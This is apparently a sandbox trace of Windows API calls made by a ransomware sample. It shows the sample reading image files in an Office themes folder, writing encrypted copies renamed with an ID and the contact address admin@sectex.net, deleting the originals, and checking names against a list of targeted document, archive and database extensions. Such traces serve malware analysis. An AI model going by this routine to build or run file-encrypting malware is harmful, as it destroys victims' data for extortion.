	[0044.446] GetLastError () returned 0x0
	[0044.446] ReadFile (in: hFile=0x1a8, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x563, lpOverlapped=0x0) returned 1
	[0044.449] WriteFile (in: hFile=0x184, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x570, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x570, lpOverlapped=0x0) returned 1
	[0044.450] ReadFile (in: hFile=0x1a8, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0044.450] WriteFile (in: hFile=0x184, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0044.451] SetEndOfFile (hFile=0x184) returned 1
	[0044.451] CloseHandle (hObject=0x184) returned 1
	[0044.451] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.451] SetEndOfFile (hFile=0x1a8) returned 1
	[0044.452] CloseHandle (hObject=0x1a8) returned 1
	[0044.452] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0044.452] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\preview.gif")) returned 1
	[0044.452] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73
	[0044.452] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73
	[0044.452] lstrlenW (lpString=".doc") returned 4
	[0044.452] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0044.452] lstrlenW (lpString=".docx") returned 5
	[0044.452] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0044.453] lstrlenW (lpString=".pdf") returned 4
	[0044.453] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0044.453] lstrlenW (lpString=".xls") returned 4
	[0044.453] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0044.453] lstrlenW (lpString=".xlsx") returned 5
	[0044.453] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0044.453] lstrlenW (lpString=".ppt") returned 4
	[0044.453] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0044.453] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73
	[0044.453] lstrlenW (lpString=".zip") returned 4
	[0044.453] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0044.453] lstrlenW (lpString=".rar") returned 4
	[0044.453] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0044.453] lstrlenW (lpString=".bz2") returned 4
	[0044.453] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0044.453] lstrlenW (lpString=".7z") returned 3
	[0044.453] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0044.453] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73
	[0044.453] lstrlenW (lpString=".dbf") returned 4
	[0044.453] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0044.453] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73
	[0044.453] lstrlenW (lpString=".1cd") returned 4
	[0044.453] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0044.453] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73
	[0044.453] lstrlenW (lpString=".jpg") returned 4
	[0044.453] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0044.453] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73
	[0044.453] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73
	[0044.453] lstrlenW (lpString=".doc") returned 4
	[0044.453] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0044.453] lstrlenW (lpString=".docx") returned 5
	[0044.453] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0044.454] lstrlenW (lpString=".pdf") returned 4
	[0044.454] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0044.454] lstrlenW (lpString=".xls") returned 4
	[0044.454] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0044.454] lstrlenW (lpString=".xlsx") returned 5
	[0044.454] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0044.454] lstrlenW (lpString=".ppt") returned 4
	[0044.454] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0044.454] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73
	[0044.454] lstrlenW (lpString=".zip") returned 4
	[0044.454] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0044.454] lstrlenW (lpString=".rar") returned 4
	[0044.454] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0044.454] lstrlenW (lpString=".bz2") returned 4
	[0044.454] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0044.454] lstrlenW (lpString=".7z") returned 3
	[0044.454] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0044.454] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73
	[0044.454] lstrlenW (lpString=".dbf") returned 4
	[0044.454] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0044.454] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73
	[0044.454] lstrlenW (lpString=".1cd") returned 4
	[0044.454] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0044.454] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73
	[0044.454] lstrlenW (lpString=".jpg") returned 4
	[0044.454] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0044.454] lstrcmpiW (lpString1=".PNG", lpString2=".bot") returned 1
	[0044.454] lstrlenW (lpString="THMBNAIL.PNG") returned 12
	[0044.454] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0044.455] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=48115) returned 1
	[0044.455] CloseHandle (hObject=0x1a8) returned 1
	[0044.455] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\thmbnail.png")) returned 0x20
	[0044.455] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0044.455] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0044.455] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.455] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.455] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0044.456] GetLastError () returned 0x0
	[0044.456] ReadFile (in: hFile=0x1a8, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0xbbf3, lpOverlapped=0x0) returned 1
	[0044.458] WriteFile (in: hFile=0x184, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xbc00, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xbc00, lpOverlapped=0x0) returned 1
	[0044.459] ReadFile (in: hFile=0x1a8, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0044.459] WriteFile (in: hFile=0x184, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0044.459] SetEndOfFile (hFile=0x184) returned 1
	[0044.459] CloseHandle (hObject=0x184) returned 1
	[0044.460] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.460] SetEndOfFile (hFile=0x1a8) returned 1
	[0044.461] CloseHandle (hObject=0x1a8) returned 1
	[0044.461] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0044.461] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\thmbnail.png")) returned 1
	[0044.461] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74
	[0044.461] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74
	[0044.461] lstrlenW (lpString=".doc") returned 4
	[0044.461] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0044.461] lstrlenW (lpString=".docx") returned 5
	[0044.461] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0044.461] lstrlenW (lpString=".pdf") returned 4
	[0044.461] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0044.461] lstrlenW (lpString=".xls") returned 4
	[0044.461] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0044.461] lstrlenW (lpString=".xlsx") returned 5
	[0044.461] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0044.462] lstrlenW (lpString=".ppt") returned 4
	[0044.462] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0044.462] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74
	[0044.462] lstrlenW (lpString=".zip") returned 4
	[0044.462] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0044.462] lstrlenW (lpString=".rar") returned 4
	[0044.462] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0044.462] lstrlenW (lpString=".bz2") returned 4
	[0044.462] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0044.462] lstrlenW (lpString=".7z") returned 3
	[0044.462] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0044.462] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74
	[0044.462] lstrlenW (lpString=".dbf") returned 4
	[0044.462] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0044.462] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74
	[0044.462] lstrlenW (lpString=".1cd") returned 4
	[0044.462] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0044.462] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74
	[0044.462] lstrlenW (lpString=".jpg") returned 4
	[0044.462] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0044.462] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74
	[0044.462] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74
	[0044.462] lstrlenW (lpString=".doc") returned 4
	[0044.462] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0044.462] lstrlenW (lpString=".docx") returned 5
	[0044.462] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0044.462] lstrlenW (lpString=".pdf") returned 4
	[0044.462] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0044.462] lstrlenW (lpString=".xls") returned 4
	[0044.462] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0044.462] lstrlenW (lpString=".xlsx") returned 5
	[0044.462] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0044.462] lstrlenW (lpString=".ppt") returned 4
	[0044.463] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0044.463] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74
	[0044.463] lstrlenW (lpString=".zip") returned 4
	[0044.463] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0044.463] lstrlenW (lpString=".rar") returned 4
	[0044.463] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0044.463] lstrlenW (lpString=".bz2") returned 4
	[0044.463] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0044.463] lstrlenW (lpString=".7z") returned 3
	[0044.463] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0044.463] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74
	[0044.463] lstrlenW (lpString=".dbf") returned 4
	[0044.463] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0044.463] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74
	[0044.463] lstrlenW (lpString=".1cd") returned 4
	[0044.463] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0044.463] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74
	[0044.463] lstrlenW (lpString=".jpg") returned 4
	[0044.463] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0044.463] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0044.463] lstrlenW (lpString="PREVIEW.GIF") returned 11
	[0044.463] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0044.464] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=1364) returned 1
	[0044.464] CloseHandle (hObject=0x1a8) returned 1
	[0044.464] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\preview.gif")) returned 0x20
	[0044.464] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\preview.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0044.464] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0044.464] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.464] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.464] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\preview.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4
	[0044.466] GetLastError () returned 0x0
	[0044.466] ReadFile (in: hFile=0x1a8, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x554, lpOverlapped=0x0) returned 1
	[0044.467] WriteFile (in: hFile=0x1f4, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x560, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x560, lpOverlapped=0x0) returned 1
	[0044.468] ReadFile (in: hFile=0x1a8, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0044.468] WriteFile (in: hFile=0x1f4, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0044.468] SetEndOfFile (hFile=0x1f4) returned 1
	[0044.469] CloseHandle (hObject=0x1f4) returned 1
	[0044.469] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.469] SetEndOfFile (hFile=0x1a8) returned 1
	[0044.470] CloseHandle (hObject=0x1a8) returned 1
	[0044.470] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0044.470] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\preview.gif")) returned 1
	[0044.470] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75
	[0044.470] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75
	[0044.470] lstrlenW (lpString=".doc") returned 4
	[0044.470] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0044.470] lstrlenW (lpString=".docx") returned 5
	[0044.470] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0044.470] lstrlenW (lpString=".pdf") returned 4
	[0044.470] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0044.470] lstrlenW (lpString=".xls") returned 4
	[0044.470] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0044.470] lstrlenW (lpString=".xlsx") returned 5
	[0044.470] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0044.470] lstrlenW (lpString=".ppt") returned 4
	[0044.470] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0044.470] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75
	[0044.470] lstrlenW (lpString=".zip") returned 4
	[0044.471] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0044.471] lstrlenW (lpString=".rar") returned 4
	[0044.471] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0044.471] lstrlenW (lpString=".bz2") returned 4
	[0044.471] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0044.471] lstrlenW (lpString=".7z") returned 3
	[0044.471] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0044.471] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75
	[0044.471] lstrlenW (lpString=".dbf") returned 4
	[0044.471] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0044.471] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75
	[0044.471] lstrlenW (lpString=".1cd") returned 4
	[0044.471] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0044.471] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75
	[0044.471] lstrlenW (lpString=".jpg") returned 4
	[0044.471] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0044.471] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75
	[0044.471] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75
	[0044.471] lstrlenW (lpString=".doc") returned 4
	[0044.471] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0044.471] lstrlenW (lpString=".docx") returned 5
	[0044.471] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0044.471] lstrlenW (lpString=".pdf") returned 4
	[0044.471] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0044.471] lstrlenW (lpString=".xls") returned 4
	[0044.471] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0044.471] lstrlenW (lpString=".xlsx") returned 5
	[0044.471] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0044.471] lstrlenW (lpString=".ppt") returned 4
	[0044.471] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0044.471] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75
	[0044.471] lstrlenW (lpString=".zip") returned 4
	[0044.471] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0044.471] lstrlenW (lpString=".rar") returned 4
	[0044.472] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0044.472] lstrlenW (lpString=".bz2") returned 4
	[0044.472] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0044.472] lstrlenW (lpString=".7z") returned 3
	[0044.472] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0044.472] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75
	[0044.472] lstrlenW (lpString=".dbf") returned 4
	[0044.472] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0044.472] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75
	[0044.472] lstrlenW (lpString=".1cd") returned 4
	[0044.472] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0044.472] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75
	[0044.472] lstrlenW (lpString=".jpg") returned 4
	[0044.472] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0044.472] lstrcmpiW (lpString1=".PNG", lpString2=".bot") returned 1
	[0044.472] lstrlenW (lpString="THMBNAIL.PNG") returned 12
	[0044.472] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc
	[0044.720] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=11573) returned 1
	[0044.720] CloseHandle (hObject=0x1fc) returned 1
	[0044.720] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\thmbnail.png")) returned 0x20
	[0044.720] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0044.720] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc
	[0044.720] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.720] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
